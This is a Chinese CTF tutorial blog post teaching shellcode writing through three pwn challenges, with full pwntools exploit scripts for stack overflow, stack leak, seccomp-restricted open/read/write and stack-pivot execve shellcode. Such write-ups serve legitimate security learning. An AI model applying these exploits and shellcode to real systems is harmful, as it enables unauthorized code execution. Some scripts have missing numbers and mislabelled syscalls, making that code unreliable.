本文由“合天智汇”公众号首发 作者:hope
引言
之前遇到没开启NX保护的时候,都是直接用pwtools库里的shellcode一把梭,也不太懂shellcode代码具体做了些什么,遇到了几道不能一把梭的题目,简单学习一下shellcode的编写。
前置知识
  • NX(堆栈不可执行)保护
  • shellcode(一段16进制的数据,转化为字符串则为汇编代码)
pwnable之start
保护检测
可以看到这道题目什么保护都没有开
 
简单shellcode学习-LMLPHP
 
ida分析
题目只有start函数,可以知道该题是用汇编语言写的,顺便可以锻炼一下自己看汇编的能力
 
简单shellcode学习-LMLPHP
 
汇编代码分析
简单来说,程序调用了wirte函数去打印字符,接着调用read函数输入,但是这里的输入没有限制,因此有一个栈溢出的漏洞,而且程序有个特定,他将esp的值首先压入了栈中,esp存的是栈顶的地址,使得我们能够找到栈的地址,为我们返回shellcode做准备
push    esp         #将esp寄存器的值压入栈中,这里可以获得栈的地址
push offset _exit #将_exit函数地址压入栈中,使得start函数执行完毕时返回exit函数
xor eax, eax #清空eax寄存器的值
xor ebx, ebx #清空ebx寄存器的值
xor ecx, ecx #清空ecx寄存器的值
xor edx, edx #清空edx寄存器的值
push 3A465443h
push 20656874h
push 20747261h
push 74732073h
push 2774654Ch #压入一堆字符串,即程序运行时的字符串,Let's start the CTF:
mov ecx, esp ; addr,将字符串的地址放入ecx寄存器中
mov dl, 14h ; len,将打印长度放进dl寄存器中,即16位寄存器
mov bl, 1 ; fd,1为文件描述符,指的是屏幕
mov al, 4 #eax寄存器,存放的是调用号,4调用号即,write函数
int 80h ; LINUX - sys_write,int 0x80调用80中断
xor ebx, ebx #清空ebx寄存器,0为文件描述符,即外部输入,例如键盘
mov dl, 3Ch #输入的长度 0x3c
mov al, 3 #3调用号,即read函数
int 80h ; LINUX -
add esp, 14h #恢复栈平衡,因为压入字符串消耗了0x14的栈空间,使用完毕后需要换远
retn #返回

函数调用表

简单shellcode学习-LMLPHP

思路
  • 程序开始将esp的值压入栈中,可以获得栈的地址
  • 由于程序没有限制输入,因此有栈溢出漏洞,可以修改程序执行的流程
获得栈地址
根据程序的流程,我们可以画出栈的情况
 
简单shellcode学习-LMLPHP
 
跟踪调试一下,跟我们预期的一样
简单shellcode学习-LMLPHP
继续跟踪直到程序运行完add esp,14h,查看一下栈结构
简单shellcode学习-LMLPHP
此时返回地址指向exit函数,在执行完ret指令后,esp寄存器内容就为栈地址,想要泄露栈地址,则需要将返回地址修改为write函数,那么具体返回到哪个地址我们继续分析。
可以看到0x4调用前,需要往相应的寄存器传入相应的参数,其中ecx寄存器就是用于指向需要打印字符串的起始地址。
mov     ecx, esp        ; addr,将字符串的地址放入ecx寄存器中
mov dl, 14h ; len,将打印长度放进dl寄存器中,即16位寄存器
mov bl, 1 ; fd,1为文件描述符,指的是屏幕
mov al, 4 #eax寄存器,存放的是调用号,4调用号即,write函数
int 80h ; LINUX - sys_write,int
在执行完ret指令后,此时的esp寄存器的内容恰好指向栈顶的地址
0xffffd12c —▸ 0xffffd130
#因为push esp,会使得esp的值减4,因此此时的esp指针指向的内容是旧的esp指针,这点需要注意

简单shellcode学习-LMLPHP
因此只要将返回地址修改为mov ecx,esp的地址即可打印出栈的地址
sh.recvuntil("Let's start the CTF:")
payload = 'a'*20 + p32(0x8048087)#mov ecx,esp的地址
#attach(sh)
sh.send(payload)
esp = u32(sh.recv(4))
print 'esp:'+hex(esp)

返回栈地址,执行shellcode

由于程序没有开启NX保护,即栈空间里的数据是可以执行的,那么我们输入execve()函数调用的汇编代码,即可执行getshell
简单shellcode学习-LMLPHP

shellcode

c语言表示:execve("/bin/sh\x00",0,0)
汇编代码:
mov eax,0xb #将调用号设置为0xb,即函数execve的调用号
xor edx,edx #清空edx寄存器,因为execve的函数edx的值为0
xor ecx,ecx #清空ecx寄存器,因为execve的函数ecx的值为0
push 0x0068732f #\x00hs/
push 0x6e69622f #nib/,小端模式需要反着压入栈中
mov ebx,esp #将字符串的地址传递给ebx
int 0x80 #调用80中断
16进制表示:
利用pwntools库里的asm()函数,将汇编代码以16进制的表示形式输入

可以看到简单的shellcode编写需要对照着系统调用号的表,挑取你需要的函数,然后对照着表将参数输入到对应的寄存器,继而调用80中断实现调用函数。

payload1 = 'a'*20+p32(esp+20)#该返回地址需要自己去调试看看自己shellcode的起始地址,算出与泄露出的栈顶地址的偏移即可
payload = asm("mov eax,0xb")
payload += asm("xor edx,edx")
payload += asm("xor ecx,ecx")
payload += asm("push 0x0068732f")
payload += asm("push 0x6e69622f")
payload += asm("mov ebx,esp")
payload += asm("int 0x80")
sh.send(payload1+payload)

完整的exp

from pwn import *

context(arch='i386',os='linux')
sh = process("./start")
#sh = remote("node3.buuoj.cn",29479)
sh.recvuntil("Let's start the CTF:")
payload = 'a'*20 + p32(0x8048087)
#attach(sh)
sh.send(payload)
esp = u32(sh.recv(4))
print 'esp:'+hex(esp)
payload1 = 'a'*20+p32(esp+20)
payload = asm("mov eax,0xb")
payload += asm("xor edx,edx")
payload += asm("xor ecx,ecx")
payload += asm("push 0x0068732f")
payload += asm("push 0x6e69622f")
payload += asm("mov ebx,esp")
payload += asm("int 0x80")
sh.send(payload1+payload)
sh.interactive()

pwnable之orw

保护检测
开启了canary保护,存在可写并且可执行的区域
简单shellcode学习-LMLPHP
ida分析
orw_seccomp
在该函数里开启了沙盒,这里可以用seccomp-tools去看下沙盒禁用了什么函数
简单shellcode学习-LMLPHP
 
工具下载:https://github.com/david942j/seccomp-tools
可以看到,当用i386机器运行此程序时,只允许使用rt_sigreturn,sigreturn,exit_group,open,read,write的系统调用,我们常用的execve调用是不允许被使用的
 
简单shellcode学习-LMLPHP
 
看一下题目描述,告诉我们flag位于/home/orw/flag处,而且只允许使用open,read,write的系统调用,这是因为其他系统调用被prtcl函数所禁用了,这里我们关注在于shellcode,prctl则在后面的文章会详细介绍。
 
简单shellcode学习-LMLPHP
 
main函数
名为shellcode的变量位于.bss段,在输入完毕后会将该变量以函数的形式调用,则这道题不需要去寻找shellcode的返回地址,直接输入一段shellcode即可
 
简单shellcode学习-LMLPHP
 
思路
  • 首先程序禁用了execve系统调用,只开放了open,read,以及write的系统调用,意义很明确,是让我们将flag都出来,而不是取得目标机器的shell
shellcode的编写
在写shellcode前,我们可以先用c语言将读flag的伪代码写出来
c语言
fd = open("/home/orw/flag","w");//首先打开文件
read(fd,buf,0x20);//读取文件的信息,放入到局部变量buf中
write(,buf,0x20);//将变量buf的内容打印出来,这里的足够打印出flag的长度即可,由于不知道flag的具体长度可以设置为长一点

简单shellcode学习-LMLPHP

shellcode
#首先对照伪C代码以及系统调用表进行shellcode的编写
fd = open("/home/orw/flag","w")
#相应的汇编
xor ecx,ecx #清空ecx寄存器,open的调用该寄存器的值设为null
xor edx,edx #清空edx寄存器,open的调用该寄存器的值设为null
mov eax,0x5 #调用号设置为5
push 0x006761 #将/home/orw/flag压入栈中,注意是栈是先进后出,因此字符串需要从最末尾开始压入即将字符
push 0x6c662f77 #转为16进制要反向排序,并且字符串需要添加截断符\x00,push要以4字节为单位。
push 0x726f2f65
push 0x6d6f682f
mov ebx,esp #fd的值为路径的地址
int 0x80 #调用80中断,实现系统调用 #c语言
read(fd,buf,0x20)或read(,buf,0x20)#这里的3为其他文件描述符,下面会详细介绍
#相应的汇编
mov eax,0x4
mov ebx,0x3 #这里用3代替了oepn返回的fd指针,因为3可以用作于打开文件时的文件描述符,若想用open返回的指针则应该将系统调用号移动到eax寄存器前,先保存eax的内容。
mov ecx,esp #将esp作为临时变量buf的地址
mov edx,0x20 #读入的长度为0x20
int 0x80 #调用80中断,实现系统调用 #c语言
write(,buf,0x20)
#相应的汇编
mov eax,0x3#系统调用号0x3
mov ebx,0x1#文件描述符为1,指向屏幕
mov ecx,esp #将esp作为临时变量buf的地址
mov edx,0x20 #打印的字符串的长度
int 0x80 #调用80中断,实现系统调用 #这里可以用pwntools库的一个函数代替,shellcraft
c语言:open("/home/orw/flag") <==> 汇编:asm(shellcraft.open("/home/orw/flag"))
c语言:read(,buf,0x20)<==> 汇编:asm(shellcraft.read(,"esp",0x20)
c语言:write(,buf,0x20)<==>汇编:asm(shellcraft.write(,"esp",0x20))
文件描述符

文件描述符
内核(kernel)利用文件描述符(file descriptor)来访问文件。文件描述符是非负整数。打开现存文件或新建文件时,内核会返回一个文件描述符。读写文件也需要使用文件描述符来指定待读写的文件。(来自百度百科)
  • 0代表标准输入流,stdin
  • 1代表标准输出流,stdout
  • 2代表标准错误流,stderr
  • 当打开一个新的文件时,它的文件描述符为3
exp1
from pwn import *
context(log_level='debug',arch='i386',os='linux')
#sh = remote("node3.buuoj.cn",)
sh = remote("chall.pwnable.tw",)
sh.recvuntil("shellcode:") payload = asm(shellcraft.open("/home/orw/flag"))
payload += asm(shellcraft.read(,"esp",))
payload += asm(shellcraft.write(,"esp",))
sh.sendline(payload) sh.interactive()
exp2
from pwn import *

context(arch='i386',os='linux')
#sh = remote("node3.buuoj.cn",)
sh = remote("chall.pwnable.tw",)
sh.recvuntil("shellcode:")
payload = asm("xor ecx,ecx")
payload += asm("xor edx,edx")
payload += asm("mov eax,0x5")
payload += asm("push 0x006761")
payload += asm("push 0x6c662f77")
payload += asm("push 0x726f2f65")
payload += asm("push 0x6d6f682f")
payload += asm("mov ebx,esp")
payload += asm("int 0x80") payload += asm("mov eax,0x3")
payload += asm("mov ebx,0x3")
payload += asm("mov ecx,esp")
payload += asm("mov edx,0x20")
payload += asm("int 0x80") payload += asm("mov eax,0x4")
payload += asm("mov ebx,0x1")
payload += asm("mov ecx,esp")
payload += asm("mov edx,0x2")
payload += asm("int 0x80") sh.sendline(payload)
sh.interactive()

2019广东强网杯线下题目

保护检测
同样是基本没开启防护,并且具有可写并可执行区域
简单shellcode学习-LMLPHP
ida分析
main函数
程序有1,2,3,三个选择,选择1 时仅仅是打印一串无作用的字符串,选择2时会当挑战满足时会打印栈地址,选择3可以执行栈溢出漏洞
 
简单shellcode学习-LMLPHP
 
仅仅只有0x10的溢出空间,可以恰好覆盖返回地址
 
简单shellcode学习-LMLPHP
 
magic函数
当传入的参数a2的值等于305419896时,则打印a1的值
 
简单shellcode学习-LMLPHP
 
我们可以看下magic函数传入的两个变量,一个为buf的地址,一个为局部变量v11,v11的值可以通过buf溢出后修改
 
简单shellcode学习-LMLPHP
 
思路
  • 程序存在栈溢出的漏洞,但是溢出的字节数较少,只能刚好溢出返回地址
  • 程序可以利用栈溢出覆盖变量v11的值,从而泄露buf的地址
  • 这道题我们用另一种思路,在栈上写栈转移的汇编代码,将栈转移到.bss段中,在向.bss段写入shellcode,需要注意的是该题是64位,而64位的系统调用号与32位不同。
简单shellcode学习-LMLPHP

汇编代码分析

payload = asm("mov rax,0;") #系统调用号
payload += asm("mov rdi,0;")#文件描述符
payload += asm("mov rsi,0x601080")#.bss段地址,用于buf地址
payload += asm("mov rdx,0x40")#输入长度
payload += asm("syscall")#syscall启动调用
payload += asm("push 0x601080")#返回地址
payload += asm("ret")#ret指令返回任意地址
payload = payload.ljust(0x38,'b')
payload += p64(addr)

完整的exp

from pwn import *
context(log_level='debug',arch='amd64',os='linux')
sh = process("./pwn")
sh.recvuntil(" your choice:")
sh.sendline("")
sh.recvuntil("What?")
payload = 'a'*0x28+p64()
sh.send(payload)
sh.recvuntil(" your choice:")
sh.sendline("")
sh.recvuntil("It is magic: [")
addr = int(sh.recv(),)
print 'addr:'+hex(addr)
sh.sendline("")
sh.recvuntil("What?")
payload = asm("mov rax,0;")
payload += asm("mov rdi,0;")
payload += asm("mov rsi,0x601080")
payload += asm("mov rdx,0x40")
payload += asm("syscall")
payload += asm("push 0x601080")
payload += asm("ret")
payload = payload.ljust(0x38,'b')
payload += p64(addr)
#attach(sh)
sh.send(payload)
payload = asm("mov eax,59") #调用59号系统调用,execve("/bin/sh",,);
payload += asm("xor rsi,rsi")
payload += asm("xor rdx,rdx")
payload += asm("mov rdi, 0x6010a8")
payload += asm("syscall")
payload = payload.ljust(0x28,'\x00')
payload += '/bin/sh\x00'
attach(sh)
sh.send(payload)
sh.interactive()

总结

  • shellcode的编写的需要借助调用表,根据调用表的参数值,往对应的寄存器赋值
  • start例题学会常用的系统调用execve("/bin/sh",0,0)的编写
  • orw例题则学会读给定路径的内容,从而学习open,read,write系统调用的编写
  • 广东强网杯这题则灵活利用栈可执行的条件,使用汇编实现栈转移,以及往指定地址写入内容。
shellcode原理
(shellcode是一段用于利用软件漏洞而执行的代码,可在有能力劫持指令寄存器后,在内存中塞入一段可让CPU执行的shellcode机器码,让电脑可以执行攻击者的任意指令。)
声明:笔者初衷用于分享与普及网络知识,若读者因此作出任何危害网络安全行为后果自负,与合天智汇及原作者无关!
 
 
05-19 23:20